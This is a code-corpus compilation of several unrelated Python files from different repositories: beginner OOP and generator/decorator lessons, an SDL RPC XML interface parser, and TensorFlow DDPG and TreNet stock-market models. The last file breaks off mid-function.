        #figure._Formulas_2D__figure = 'quadrat'  # without encapsulation they can be changed after the object is created
        print(figure, figure.formulas())  # and then the result would be wrong relative to the original input parameters
    except:
        # if an exception is caught, print the following message:
        print('Argument error: unsupported figure type, see help(Formulas_2D)')


class Prime_numbers:  # definition of the Prime_numbers class
    '''
    Class documentation.
    The Prime_numbers class checks whether the given number is prime; an object
    of the class is a number.
    To create a Prime_numbers object, pass a single argument: a natural
    (positive integer) number.
    Reference: a prime number is a natural (positive integer) number that has
    exactly two distinct natural divisors -- one and itself.
    In other words, a number x is prime if it is greater than 1 and is
    divisible without remainder only by 1 and by x.
    '''
    def __init__(self, n):  # built-in class method, initialization
        self.__number = n
        if type(self.__number) != int or self.__number < 2:
            raise Exception('Error: the number entered is not natural')  # if the condition is True, raise an exception explicitly

    def __str__(self):  # built-in class method: what to print when the object itself is passed for output
        return f'Natural number {self.__number}'

    def prime_number(self):  # create a function (class method) named prime_number
        if self.__number == 2 or self.__number == 3:  # if the number equals 2 or 3, it is prime, so return True
            return True  # return the value True
        else:
            for i in range(2, int(self.__number/2)+1):  # check whether the number has an integer divisor between 2 and int(number/2); return False as soon as one is found
                if self.__number % i == 0:
                    return False
            return True  # no integer divisor found, so return True (the number is prime)


if __name__ == '__main__':
    try:
        # code below may raise an exception:
        #help(Prime_numbers)  # show the help of the created class with its documentation
        num = Prime_numbers(10)  # create an object of the class
        num.__number = 11  # with encapsulation applied, this attribute is not accessible from outside
        # num.number = 11  # without encapsulation the attribute could be changed after the object is created
        print('\n', num, ' is prime? - ', num.prime_number(), sep='')  # and then the result would be wrong relative to the original input parameters
    except:
        # if an exception is caught, print the following message:
        print('\nError: the number entered is not natural or is less than 2, see help(Prime_numbers)')
```
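The repository title also mentions inheritance and polymorphism, which this file does not demonstrate. A hypothetical child class (not part of the source) showing both against the parent above:

```python
# Hypothetical subclass for illustration only.
class Formulas_3D(Formulas_2D):
    def __init__(self, type_figure):
        self.figure = type_figure  # skip the parent's 2D-only validation

    def formulas(self):  # polymorphism: same method name, 3D formulas instead
        dict_formul = {'cube': 'S = 6*a^2, V = a^3, where a is the edge length',
                       'sphere': 'S = 4*pi*R^2, V = (4/3)*pi*R^3, where R is the radius'}
        return dict_formul[self.figure]


solid = Formulas_3D('cube')
print(solid, solid.formulas())  # __str__ is inherited from Formulas_2D
```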
{ "source": "91472/Lesson-8.-Generators-ternary-operator-decorator.", "score": 3 }
#### File: 91472/Lesson-8.-Generators-ternary-operator-decorator./Pro.py
```python
import os      # library for interacting with the OS
import psutil  # library for working with processes (info about running processes, system usage)


def rss(f):  # decorator that measures the amount of RAM consumed by the decorated function
    def wrapper(*args, **kwargs):
        # psutil.Process creates an object with statistics about the current process;
        # the PID of the current process comes from the os module: os.getpid()
        proc = psutil.Process(os.getpid())
        # memory_info() extracts information about memory usage at the current
        # moment; from the whole tuple we take only rss (RAM) in bytes, divided
        # by 1000000 to get MB:
        rss_before = proc.memory_info().rss/1000000
        fun = f(*args, **kwargs)  # call the decorated function
        proc = psutil.Process(os.getpid())
        rss_after = proc.memory_info().rss/1000000  # RAM usage after the function has been called and executed
        rss = round((rss_after - rss_before), 3)
        return rss
    return wrapper  # the decorator returns the amount of memory consumed, in MB


# 3.4. Compare the amount of RAM used by a function that creates a generator
# and by a function that creates a list with the elements: natural numbers
# from 1 to 1000000.
# Create a generator function and a list-building function for the natural
# numbers from 1 to 1000000.

# generator function:
def gen(num):
    for i in range(1, num + 1):
        yield i


# list-building function:
def gen_list(num):
    return list(i for i in range(1, num+1))


# apply the decorator defined above to the functions created above:
@rss
def gen(num):
    for i in range(1, num+1):
        yield i


@rss
def gen_list(num):
    return list(i for i in range(1, num+1))


print('RAM consumed by the generator, MB:', gen(1000000))  # call the decorated function
print('RAM consumed by the list-building function, MB:', gen_list(1000000))  # call the decorated function
```
{ "source": "914802951/sdl_core_v4.0_winceport", "score": 3 }
#### File: generator/parsers/RPCBase.py
```python
import collections
import xml.etree.ElementTree

from generator import Model


class ParseError(Exception):
    """Parse error.

    This exception is raised when XML contains errors and can't be parsed.

    """

    pass


class Parser(object):
    """RPC XML Parser base.

    This class must not be used directly. One of its subclasses must be used
    instead.

    """

    def __init__(self):
        """Constructor."""
        self._types = {}
        self._enums = collections.OrderedDict()
        self._structs = collections.OrderedDict()
        self._functions = collections.OrderedDict()
        self._params = {}

    def parse(self, filename):
        """Parse XML.

        Returns an instance of generator.Model.Interface containing parsed
        interface or raises ParseError if input XML contains errors and
        can't be parsed.

        Keyword arguments:
        filename -- name of input XML file.

        """
        tree = xml.etree.ElementTree.parse(filename)
        root = tree.getroot()

        self._enums = self._initialize_enums()
        self._structs = collections.OrderedDict()
        self._functions = collections.OrderedDict()
        self._params = {}
        self._types = dict(self._enums.items())

        self._parse_root(root)

        return Model.Interface(enums=self._enums,
                               structs=self._structs,
                               functions=self._functions,
                               params=self._params)

    def _initialize_enums(self):
        """Initialize enums.

        The default implementation returns an OrderedDict with two empty
        enums: "FunctionID" and "messageType". Required for formats where
        these enums must be generated automatically according to the
        declared in the XML functions.

        These enums are filled during the parsing of the functions.

        """
        return collections.OrderedDict(
            [("FunctionID", Model.Enum(name="FunctionID")),
             ("messageType", Model.Enum(name="messageType"))])

    def _check_enum_name(self, enum):
        """Check enum name.

        This method is called to check whether the newly parsed enum's name
        conflicts with some predefined enum.

        This implementation raises an error if enum name is one of the
        predefined enums "FunctionID" or "messageType" which must not be
        declared explicitly in the XML.

        """
        if enum.name in ["FunctionID", "messageType"]:
            raise ParseError(
                "Enum '" + enum.name +
                "' is generated automatically in SDLRPCV1 and"
                " must not be declared in xml file")

    def _check_function_param_name(self, function_param_name):
        """Check function param name.

        This method is called to check whether the newly parsed function
        parameter name conflicts with some predefined name.

        This implementation doesn't check anything because there is no
        predefined names in base RPC XML.

        """
        pass

    def _parse_root(self, root):
        """Parse root XML element.

        Default implementation parses root as interface element without a
        prefix.

        Keyword arguments:
        root -- root element.

        """
        self._parse_interface(root, "")

    def _parse_interface(self, interface, prefix):
        """Parse interface element.

        Keyword arguments:
        interface -- interface element.
        prefix -- string prefix for all types of the interface.

        """
        if interface.tag != "interface":
            raise ParseError("Invalid interface tag: " + interface.tag)

        params, subelements, attrib = self._parse_base_item(interface, "")

        for param in ["description", "design_description", "todos"]:
            if 0 != len(params[param]):
                attrib[param] = "\n".join(params[param])

        if 0 != len(params["issues"]):
            attrib["issues"] = "\n".join(i.value for i in params["issues"])

        self._params = dict(
            self._params.items() +
            [(prefix + p[0], p[1]) for p in attrib.items()])

        for element in subelements:
            if element.tag == "enum":
                enum = self._parse_enum(element, prefix)
                self._check_enum_name(enum)
                self._add_item(self._enums, enum)
                self._add_type(enum)
            elif element.tag == "struct":
                struct = self._parse_struct(element, prefix)
                self._add_item(self._structs, struct)
                self._add_type(struct)
            elif element.tag == "function":
                function = self._parse_function(element, prefix)
                self._add_item(self._functions, function,
                               (function.function_id, function.message_type))
            else:
                raise ParseError("Unexpected element: " + element.tag)

    @staticmethod
    def _add_item(items, item, key=None):
        """Add new item in the items dictionary with given key.

        Performs additional check for presence in the dictionary and throws
        ParseError exception if key already exist.

        """
        if key is None:
            key = item.name

        if key in items:
            raise ParseError(type(item).__name__ + " '" + str(key) +
                             "' is declared more than once")
        items[key] = item

    def _add_type(self, _type):
        """Add new type in the internal types dictionary.

        Performs additional check for presence type with same name in the
        dictionary and throws ParseError exception if key already exist.

        """
        if _type.name in self._types:
            raise ParseError("Type '" + _type.name +
                             "' is declared as both struct and enum")

        self._types[_type.name] = _type

    def _parse_enum(self, element, prefix):
        """Parse element as enumeration.

        Returns an instance of generator.Model.Enum

        """
        params, subelements, attributes = \
            self._parse_base_item(element, prefix)

        internal_scope = None
        scope = None
        for attribute in attributes:
            if attribute == "internal_scope":
                internal_scope = attributes[attribute]
            elif attribute == "scope":
                scope = attributes[attribute]
            else:
                raise ParseError("Unexpected attribute '" + attribute +
                                 "' in enum '" + params["name"] + "'")
        params["internal_scope"] = internal_scope
        params["scope"] = scope

        elements = collections.OrderedDict()
        for subelement in subelements:
            if subelement.tag == "element":
                self._add_item(elements, self._parse_enum_element(subelement))
            else:
                raise ParseError("Unexpected element '" + subelement.tag +
                                 "' in enum '" + params["name"] + "'")
        params["elements"] = elements

        # Magic usage is correct
        # pylint: disable=W0142
        return Model.Enum(**params)

    def _parse_struct(self, element, prefix):
        """Parse element as structure.

        Returns an instance of generator.Model.Struct

        """
        params, subelements, attrib = self._parse_base_item(element, prefix)

        scope = None
        for attribute in attrib:
            if attribute == "scope":
                scope = attrib[attribute]
            else:
                raise ParseError("Unexpected attribute '" + attribute +
                                 "' in struct '" + params["name"] + "'")
        params["scope"] = scope

        members = collections.OrderedDict()
        for subelement in subelements:
            if subelement.tag == "param":
                self._add_item(members, self._parse_param(subelement, prefix))
            else:
                raise ParseError("Unexpected subelement '" + subelement.name +
                                 "' in struct '" + params["name"] + "'")
        params["members"] = members

        # Magic usage is correct
        # pylint: disable=W0142
        return Model.Struct(**params)

    def _parse_function(self, element, prefix):
        """Parse element as function.

        Returns an instance of generator.Model.Function

        """
        params, subelements, attributes = \
            self._parse_base_item(element, prefix)

        function_id, message_type = self._parse_function_id_type(
            params["name"],
            attributes)

        scope = None
        for attribute in attributes:
            if attribute == "scope":
                scope = attributes[attribute]

        params["function_id"] = function_id
        params["message_type"] = message_type
        params["scope"] = scope

        function_params = collections.OrderedDict()
        for subelement in subelements:
            if subelement.tag == "param":
                function_param = self._parse_function_param(subelement,
                                                            prefix)
                self._check_function_param_name(function_param.name)
                if function_param.name in function_params:
                    raise ParseError("Parameter '" + function_param.name +
                                     "' is specified more than once" +
                                     " for function '" + params["name"] + "'")
                function_params[function_param.name] = function_param
            else:
                raise ParseError("Unexpected subelement '" + subelement.tag +
                                 "' in function '" + params["name"] + "'")
        params["params"] = function_params

        # Magic usage is correct
        # pylint: disable=W0142
        return Model.Function(**params)

    def _parse_function_id_type(self, function_name, attrib):
        """Parse function id and message type according to XML format.

        This implementation takes function name as function id and extracts
        attribute "messagetype" as message type and searches them in enums
        "FunctionID" and "messageType" adding the missing elements if
        necessary.

        Returns function id and message type as an instances of EnumElement.

        """
        if "messagetype" not in attrib:
            raise ParseError("No messagetype specified for function '" +
                             function_name + "'")

        function_id = self._provide_enum_element_for_function(
            "FunctionID",
            function_name)

        message_type = self._provide_enum_element_for_function(
            "messageType",
            self._extract_attrib(attrib, "messagetype"))

        return function_id, message_type

    def _provide_enum_element_for_function(self, enum_name, element_name):
        """Provide enum element for functions.

        Search an element in an enum and add it if it is missing.

        Returns EnumElement.

        """
        if enum_name not in self._types:
            raise ParseError("Enum '" + enum_name + "' is not initialized")

        enum = self._types[enum_name]

        if not isinstance(enum, Model.Enum):
            raise ParseError("'" + enum_name + "' is not an enum")

        if element_name not in enum.elements:
            enum.elements[element_name] = Model.EnumElement(name=element_name)

        return enum.elements[element_name]

    def _parse_base_item(self, element, prefix):
        """Parse element as base item.

        Returns params, sub-elements and attributes of the element.

        """
        params = {}

        description = []
        design_description = []
        issues = []
        todos = []
        subelements = []

        if "name" not in element.attrib:
            raise ParseError("Name is not specified for " + element.tag)

        params["name"] = prefix + element.attrib["name"]
        attrib = dict(element.attrib.items())
        del attrib["name"]

        params["platform"] = self._extract_attrib(attrib, "platform")

        for subelement in element:
            if subelement.tag == "description":
                description.append(self._parse_simple_element(subelement))
            elif subelement.tag == "designdescription":
                design_description.append(
                    self._parse_simple_element(subelement))
            elif subelement.tag == "todo":
                todos.append(self._parse_simple_element(subelement))
            elif subelement.tag == "issue":
                issues.append(self._parse_issue(subelement))
            else:
                subelements.append(subelement)

        params["description"] = description
        params["design_description"] = design_description
        params["issues"] = issues
        params["todos"] = todos

        return params, subelements, attrib

    @staticmethod
    def _parse_simple_element(element):
        """Parse element as simple element and returns it's text.

        Element is simple when it contains no subelements and attributes.

        Returns element text if present or empty string if not.

        """
        if len(element) != 0:
            raise ParseError("Unexpected subelements in '" +
                             element.tag + "'")
        if len(element.attrib) != 0:
            raise ParseError("Unexpected attributes in '" +
                             element.tag + "'")
        return element.text if element.text is not None else ""

    @staticmethod
    def _parse_issue(element):
        """Parse element as issue.

        Issue must not contain subelements and attributes.

        Returns an instance of generator.Model.Issue

        """
        if len(element) != 0:
            raise ParseError("Unexpected subelements in issue")
        if "creator" not in element.attrib:
            raise ParseError("No creator in issue")
        if len(element.attrib) != 1:
            raise ParseError("Unexpected attributes in issue")

        return Model.Issue(
            creator=element.attrib["creator"],
            value=element.text if element.text is not None else "")

    def _parse_enum_element(self, element):
        """Parse element as element of enumeration.

        Returns an instance of generator.Model.EnumElement

        """
        params, subelements, attributes = self._parse_base_item(element, "")

        if len(subelements) != 0:
            raise ParseError("Unexpected subelements in enum element")

        self._ignore_attribute(attributes, "hexvalue")
        self._ignore_attribute(attributes, "scope")
        self._ignore_attribute(attributes, "rootscreen")

        internal_name = None
        value = None
        for attribute in attributes:
            if attribute == "internal_name":
                internal_name = attributes[attribute]
            elif attribute == "value":
                try:
                    value = int(attributes[attribute])
                except:
                    raise ParseError("Invalid value for enum element: '" +
                                     attributes[attribute] + "'")
        params["internal_name"] = internal_name
        params["value"] = value

        # Magic usage is correct
        # pylint: disable=W0142
        return Model.EnumElement(**params)

    def _parse_param(self, element, prefix):
        """Parse element as structure parameter.

        Returns an instance of generator.Model.Param

        """
        params, subelements, attrib = \
            self._parse_param_base_item(element, prefix)

        if len(attrib) != 0:
            raise ParseError("Unknown attribute(s) {0} in param {1}"
                             .format(attrib, params["name"]))

        if len(subelements) != 0:
            raise ParseError("Unknown subelements in param '" +
                             params["name"] + "'")

        # Magic usage is correct
        # pylint: disable=W0142
        return Model.Param(**params)

    def _parse_function_param(self, element, prefix):
        """Parse element as function parameter.
Returns an instance of generator.Model.FunctionParam """ params, subelements, attrib = \ self._parse_param_base_item(element, prefix) default_value = None default_value_string = self._extract_attrib(attrib, "defvalue") if default_value_string is not None: param_type = params["param_type"] if type(param_type) is Model.Boolean: default_value = \ self._get_bool_from_string(default_value_string) elif type(param_type) is Model.Integer: try: default_value = int(default_value_string) except: raise ParseError("Invalid value for integer: '" + default_value_string + "'") elif type(param_type) is Model.Double: try: default_value = float(default_value_string) except: raise ParseError("Invalid value for float: '" + default_value_string + "'") elif type(param_type) is Model.String: default_value = default_value_string elif type(param_type) is Model.Enum or \ type(param_type) is Model.EnumSubset: if type(param_type) is Model.EnumSubset: allowed_elements = param_type.allowed_elements else: allowed_elements = param_type.elements if default_value_string not in allowed_elements: raise ParseError("Default value '" + default_value_string + "' for parameter '" + params["name"] + "' is not a member of " + type(param_type).__name__ + "'" + params["name"] + "'") default_value = allowed_elements[default_value_string] else: raise ParseError("Default value specified for " + type(param_type).__name__) params["default_value"] = default_value if len(attrib) != 0: raise ParseError("Unexpected attributes in parameter '" + params["name"] + "'") if len(subelements) != 0: raise ParseError("Unexpected subelements in parameter '" + params["name"] + "'") # Magic usage is correct # pylint: disable=W0142 return Model.FunctionParam(**params) def _parse_param_base_item(self, element, prefix): """Parse base param items. Returns params, other subelements and attributes. 
""" params, subelements, attrib = self._parse_base_item(element, "") params["is_mandatory"] = self._extract_optional_bool_attrib( attrib, "mandatory", True) scope = self._extract_attrib(attrib, "scope") if scope is not None: params["scope"] = scope default_value = None; param_type = None type_name = self._extract_attrib(attrib, "type") if type_name is None: raise ParseError("Type is not specified for parameter '" + params["name"] + "'") if type_name == "Boolean": default_value = self._extract_attrib( attrib, "defvalue") if default_value != None: default_value = self._get_bool_from_string(default_value); param_type = Model.Boolean(default_value=default_value) elif type_name == "Integer" or \ type_name == "Float" or \ type_name == "Double" : min_value = self._extract_optional_number_attrib( attrib, "minvalue", int if type_name == "Integer" else float) max_value = self._extract_optional_number_attrib( attrib, "maxvalue", int if type_name == "Integer" else float) default_value = self._extract_optional_number_attrib( attrib, "defvalue", int if type_name == "Integer" else float) param_type = \ (Model.Integer if type_name == "Integer" else Model.Double)( min_value=min_value, max_value=max_value, default_value=default_value) elif type_name == "String": min_length = self._extract_optional_number_attrib( attrib, "minlength") # if minlength is not defined default value is 1 if min_length is None: min_length = 1 max_length = self._extract_optional_number_attrib( attrib, "maxlength") default_value = self._extract_attrib(attrib, "defvalue") param_type = Model.String(min_length=min_length, max_length=max_length, default_value=default_value) else: if 1 == type_name.count("."): custom_type_name = type_name.replace(".", "_") else: custom_type_name = prefix + type_name if custom_type_name in self._types: param_type = self._types[custom_type_name] default_value = self._extract_attrib(attrib, "defvalue") if default_value != None: if default_value not in param_type.elements: raise ParseError("Default value '" + default_value + "' for parameter '" + params["name"] + "' is not a member of " + type(param_type).__name__ + "'" + params["name"] + "'") default_value = param_type.elements[default_value] else: raise ParseError("Unknown type '" + type_name + "'") if self._extract_optional_bool_attrib(attrib, "array", False): min_size = self._extract_optional_number_attrib(attrib, "minsize") max_size = self._extract_optional_number_attrib(attrib, "maxsize") param_type = Model.Array(element_type=param_type, min_size=min_size, max_size=max_size) base_type = \ param_type.element_type if isinstance(param_type, Model.Array) \ else param_type other_subelements = [] for subelement in subelements: if subelement.tag == "element": if type(base_type) is not Model.Enum and \ type(base_type) is not Model.EnumSubset: raise ParseError("Elements specified for parameter '" + params["name"] + "' of type " + type(base_type).__name__) if type(base_type) is Model.Enum: base_type = Model.EnumSubset( name=params["name"], enum=base_type, description=params["description"], design_description=params["design_description"], issues=params["issues"], todos=params["todos"], allowed_elements={}) if "name" not in subelement.attrib: raise ParseError( "Element name is not specified for parameter '" + params["name"] + "'") element_name = subelement.attrib["name"] if len(subelement.attrib) != 1: raise ParseError("Unexpected attributes for element '" + element_name + "' of parameter '" + params["name"]) if len(subelement.getchildren()) != 0: raise 
ParseError("Unexpected subelements for element '" + element_name + "' of parameter '" + params["name"]) if element_name in base_type.allowed_elements: raise ParseError("Element '" + element_name + "' is specified more than once for" + " parameter '" + params["name"] + "'") if element_name not in base_type.enum.elements: raise ParseError("Element '" + element_name + "' is not a member of enum '" + base_type.enum.name + "'") base_type.allowed_elements[element_name] = \ base_type.enum.elements[element_name] else: other_subelements.append(subelement) if isinstance(param_type, Model.Array): param_type.element_type = base_type else: param_type = base_type params["param_type"] = param_type if default_value is not None: params["default_value"] = default_value return params, other_subelements, attrib def _extract_optional_bool_attrib(self, attrib, name, default): """Extract boolean attribute with given name. Returns value of the attribute. """ value = self._extract_attrib(attrib, name) if value is None: value = default else: value = self._get_bool_from_string(value) return value def _extract_optional_number_attrib(self, attrib, name, _type=int): """Extract number attribute with given name. Returns value of the attribute. """ value = self._extract_attrib(attrib, name) if value is not None: try: value = _type(value) except: raise ParseError("Invlaid value for " + _type.__name__ + ": '" + value + "'") return value @staticmethod def _extract_attrib(attrib, name): """Extract attribute with given name. Returns value of the attribute. """ value = None if name in attrib: value = attrib[name] del attrib[name] return value @staticmethod def _get_bool_from_string(bool_string): """Convert string representation of boolean to real bool value. Returns converted value. """ value = None if bool_string in ['0', 'false']: value = False elif bool_string in ['1', 'true']: value = True else: raise ParseError("Invalid value for bool: '" + bool_string + "'") return value def _ignore_attribute(self, attrib, name): """To be called when attribute is meaningless in terms of code generation but it's presence is not issue. Removes this attribute from attribute list. """ if name in attrib: del attrib[name] print ("Ignoring attribute '" + name + "'") return True ```
{ "source": "915288938lx/Personae-master-01", "score": 2 }
#### File: algorithm/RL/DDPG.py ```python import tensorflow as tf import numpy as np import os from algorithm import config from base.env.market import Market from checkpoints import CHECKPOINTS_DIR from base.algorithm.model import BaseRLTFModel from helper.args_parser import model_launcher_parser from helper.data_logger import generate_algorithm_logger, generate_market_logger class Algorithm(BaseRLTFModel): def __init__(self, session, env, a_space, s_space, **options): super(Algorithm, self).__init__(session, env, a_space, s_space, **options) self.actor_loss, self.critic_loss = .0, .0 # Initialize buffer. self.buffer = np.zeros((self.buffer_size, self.s_space * 2 + 1 + 1)) self.buffer_length = 0 self._init_input() self._init_nn() self._init_op() self._init_saver() self._init_summary_writer() def _init_input(self): self.s = tf.placeholder(tf.float32, [None, self.s_space], 'state') self.r = tf.placeholder(tf.float32, [None, 1], 'reward') self.s_next = tf.placeholder(tf.float32, [None, self.s_space], 'state_next') def _init_nn(self): # Initialize predict actor and critic. self.a_predict = self.__build_actor_nn(self.s, "predict/actor", trainable=True) self.q_predict = self.__build_critic(self.s, self.a_predict, "predict/critic", trainable=True) # Initialize target actor and critic. self.a_next = self.__build_actor_nn(self.s_next, "target/actor", trainable=False) self.q_next = self.__build_critic(self.s_next, self.a_next, "target/critic", trainable=False) # Save scopes self.scopes = ["predict/actor", "target/actor", "predict/critic", "target/critic"] def _init_op(self): # Get actor and critic parameters. params = [tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope) for scope in self.scopes] zipped_a_params, zipped_c_params = zip(params[0], params[1]), zip(params[2], params[3]) # Initialize update actor and critic op. self.update_a = [tf.assign(t_a, (1 - self.tau) * t_a + self.tau * p_a) for p_a, t_a in zipped_a_params] self.update_c = [tf.assign(t_c, (1 - self.tau) * t_c + self.tau * p_c) for p_c, t_c in zipped_c_params] # Initialize actor loss and train op. with tf.variable_scope('actor_loss'): self.a_loss = -tf.reduce_mean(self.q_predict) with tf.variable_scope('actor_train'): self.a_train_op = tf.train.RMSPropOptimizer(self.learning_rate).minimize(self.a_loss, var_list=params[0]) # Initialize critic loss and train op. self.q_target = self.r + self.gamma * self.q_next with tf.variable_scope('critic_loss'): self.c_loss = tf.losses.mean_squared_error(self.q_target, self.q_predict) with tf.variable_scope('critic_train'): self.c_train_op = tf.train.RMSPropOptimizer(self.learning_rate * 2).minimize(self.c_loss, var_list=params[2]) # Initialize variables. 
self.session.run(tf.global_variables_initializer()) def run(self): if self.mode != 'train': self.restore() else: for episode in range(self.episodes): self.log_loss(episode) s = self.env.reset(self.mode) while True: c, a, a_index = self.predict(s) s_next, r, status, info = self.env.forward(c, a) self.save_transition(s, a_index, r, s_next) self.train() s = s_next if status == self.env.Done: self.env.trader.log_asset(episode) break if self.enable_saver and episode % 10 == 0: self.save(episode) def train(self): if self.buffer_length < self.buffer_size: return self.session.run([self.update_a, self.update_c]) s, a, r, s_next = self.get_transition_batch() self.critic_loss, _ = self.session.run([self.c_loss, self.c_train_op], {self.s: s, self.a_predict: a, self.r: r, self.s_next: s_next}) self.actor_loss, _ = self.session.run([self.a_loss, self.a_train_op], {self.s: s}) def predict(self, s): a = self.session.run(self.a_predict, {self.s: s})[0][0] return self.get_stock_code_and_action(a, use_greedy=True, use_prob=True if self.mode == 'train' else False) def save_transition(self, s, a, r, s_next): transition = np.hstack((s, [[a]], [[r]], s_next)) self.buffer[self.buffer_length % self.buffer_size, :] = transition self.buffer_length += 1 def get_transition_batch(self): indices = np.random.choice(self.buffer_size, size=self.batch_size) batch = self.buffer[indices, :] s = batch[:, :self.s_space] a = batch[:, self.s_space: self.s_space + 1] r = batch[:, -self.s_space - 1: -self.s_space] s_next = batch[:, -self.s_space:] return s, a, r, s_next def log_loss(self, episode): self.logger.warning("Episode: {0} | Actor Loss: {1:.2f} | Critic Loss: {2:.2f}".format(episode, self.actor_loss, self.critic_loss)) def __build_actor_nn(self, state, scope, trainable=True): w_init, b_init = tf.random_normal_initializer(.0, .001), tf.constant_initializer(.1) with tf.variable_scope(scope): # state is ? * code_count * data_dim. 
            first_dense = tf.layers.dense(state,
                                          64,
                                          tf.nn.relu,
                                          kernel_initializer=w_init,
                                          bias_initializer=b_init,
                                          trainable=trainable)

            action = tf.layers.dense(first_dense,
                                     1,
                                     tf.nn.sigmoid,
                                     kernel_initializer=w_init,
                                     bias_initializer=b_init,
                                     trainable=trainable)

            return tf.multiply(action, self.a_space - 1)

    @staticmethod
    def __build_critic(state, action, scope, trainable=True):
        w_init, b_init = tf.random_normal_initializer(.0, .3), tf.constant_initializer(.1)

        with tf.variable_scope(scope):
            s_first_dense = tf.layers.dense(state,
                                            32,
                                            tf.nn.relu,
                                            kernel_initializer=w_init,
                                            bias_initializer=b_init,
                                            trainable=trainable)

            a_first_dense = tf.layers.dense(action,
                                            32,
                                            tf.nn.relu,
                                            kernel_initializer=w_init,
                                            bias_initializer=b_init,
                                            trainable=trainable)

            q_value = tf.layers.dense(tf.nn.relu(s_first_dense + a_first_dense),
                                      1,
                                      kernel_initializer=w_init,
                                      bias_initializer=b_init,
                                      trainable=trainable)

            return q_value


def main(args):
    mode = args.mode
    # mode = 'test'
    codes = args.codes
    # codes = ["AU88", "RB88", "CU88", "AL88"]
    # codes = ["T9999"]
    market = args.market
    # market = 'future'
    episode = args.episode
    # episode = 2000
    # training_data_ratio = 0.5
    training_data_ratio = args.training_data_ratio

    model_name = os.path.basename(__file__).split('.')[0]

    env = Market(codes, start_date="2012-01-01", end_date="2019-07-19", **{
        "market": market,
        # "use_sequence": True,
        "logger": generate_market_logger(model_name),
        "training_data_ratio": training_data_ratio,
    })

    algorithm = Algorithm(tf.Session(config=config), env, env.trader.action_space, env.data_dim, **{
        "mode": mode,
        "episodes": episode,
        "enable_saver": True,
        "learning_rate": 0.003,
        "enable_summary_writer": True,
        "logger": generate_algorithm_logger(model_name),
        "save_path": os.path.join(CHECKPOINTS_DIR, "RL", model_name, market, "model"),
        "summary_path": os.path.join(CHECKPOINTS_DIR, "RL", model_name, market, "summary"),
    })

    algorithm.run()
    algorithm.eval()
    algorithm.plot()


if __name__ == '__main__':
    main(model_launcher_parser.parse_args())
```
#### File: algorithm/SL/TreNet.py
```python
import tensorflow as tf
import logging
import os

from algorithm import config
from base.env.market import Market
from checkpoints import CHECKPOINTS_DIR
from base.algorithm.model import BaseSLTFModel
from sklearn.preprocessing import MinMaxScaler
from helper.args_parser import model_launcher_parser


class Algorithm(BaseSLTFModel):
    def __init__(self, session, env, seq_length, x_space, y_space, **options):
        super(Algorithm, self).__init__(session, env, **options)

        # Shape: (len(dates), 5, 3 * feature_dim) -- a 3-D array.
        # x_space = env.data_dim, y_space = env.code_count.
        self.seq_length, self.x_space, self.y_space = seq_length, x_space, y_space

        try:
            self.hidden_size = options['hidden_size']
        except KeyError:
            self.hidden_size = 1

        # All of the methods below run once when Algorithm is instantiated.
        self._init_input()
        self._init_nn()
        self._init_op()
        self._init_saver()
        self._init_summary_writer()

    # Runs once when the class is constructed.
    def _init_input(self):
        # Shape (?, 5, 20); x_space = env.data_dim, y_space = env.code_count.
        self.rnn_x = tf.placeholder(tf.float32, [None, self.seq_length, self.x_space])
        # Shape (?, 5, 20, 1); the trailing 1 is the number of input channels --
        # stock data has a single channel, which matches the CNN input layout.
        self.cnn_x = tf.placeholder(tf.float32, [None, self.seq_length, self.x_space, 1])
        # Shape (?, 4).
        self.label = tf.placeholder(tf.float32, [None, self.y_space])

    # Runs once when the class is constructed.
    def _init_nn(self):
        # self.add_rnn is the static method defined on BaseTFModel (the parent of
        # BaseSLTFModel); it builds the cells -- here a stack of BasicLSTMCell:
        #     def add_rnn(layer_count, hidden_size, cell=rnn.BasicLSTMCell, activation=tf.tanh):
        #         return rnn.MultiRNNCell(cells)
        self.rnn = self.add_rnn(1, self.hidden_size)  # returns the LSTM cells; "hidden_size": 5
        self.rnn_output, c_t_and_h_t = tf.nn.dynamic_rnn(self.rnn, self.rnn_x, dtype=tf.float32)  # rnn_output has shape (?, 5, 5)
        self.rnn_output = self.rnn_output[:, -1]  # rnn_output becomes (?, 5)
        # self.cnn_x is a [-1, 5, 20, 1] tensor; after the cnn the shape will be [-1, 5, 20, 2].
        # Why 20? The author used 4 stocks in this project, each with 5 features
        # ['open', 'high', 'low', 'close', 'volume'], and the placeholder is declared as
        # (None, self.seq_length, self.x_space, 1), i.e. self.x_space = env.data_dim = 20.
        # That is simply the CNN input layout: (batch_size, width, height, channels).
        # add_cnn stacks a convolutional layer and a max-pooling layer and returns the pooling output.
        self.cnn = self.add_cnn(self.cnn_x, filters=2, kernel_size=[2, 2], pooling_size=[2, 2])  # a tensor of shape (?, 5, 20, 2)
        # Flatten every dimension except the batch one; the result has shape (?, 200),
        # since 5 * 20 * 2 == 200. The Keras equivalent is model.add(layers.Flatten()):
        # "first we need to flatten the 3-D output to 1-D". No activation is involved
        # here, so a plain reshape is enough.
        self.cnn_output = tf.reshape(self.cnn, [-1, self.seq_length * self.x_space * 2])
        # Feature-fusion layer: concatenate the two outputs; the result has shape (?, 205).
        self.y_concat = tf.concat([self.rnn_output, self.cnn_output], axis=1)
        # Add a dense (fully connected) layer; the result has shape (?, 16).
        self.y_dense = self.add_fc(self.y_concat, 16)
        # Add one more dense layer to finally obtain self.y: the result has shape (?, 4),
        # i.e. the last dimension of y_dense is mapped to y_space.
        self.y = self.add_fc(self.y_dense, self.y_space)

    # Runs once when the class is constructed.
    # Consumes the final output -- this is effectively the loss function.
    def _init_op(self):
        # Algorithm calls this method during initialization, so both
        # tf.variable_scope blocks below are created at that point as well.
        with tf.variable_scope('loss'):
            self.loss = tf.losses.mean_squared_error(self.y, self.label)
        with tf.variable_scope('train'):
            self.global_step = tf.Variable(0, trainable=False)
            self.optimizer = tf.train.AdamOptimizer(self.learning_rate)  # learning rate = 0.001
            # Inside the 'train' scope, build the op that minimizes the loss.
            self.train_op = self.optimizer.minimize(self.loss)
        self.session.run(tf.global_variables_initializer())

    # Training loop; train_steps defaults to 100000.
    def train(self):
        for step in range(self.train_steps):
            # batch_x and batch_y hold the data for days n..n+32 and n+1..n+33
            # respectively; in other words, batch_y is also the label.
            batch_x, batch_y = self.env.get_batch_data(self.batch_size)  # tuple of shape (32, 5, 20)
            # Feed batch_x to both the recurrent and the convolutional network; note
            # the shapes match the placeholders declared in _init_input().
            x_rnn, x_cnn = batch_x, batch_x.reshape((-1, self.seq_length, self.x_space, 1))  # (32, 5, 20), (32, 5, 20, 1)
            # Run the session with two ops: one evaluates the loss, the other executes train_op.
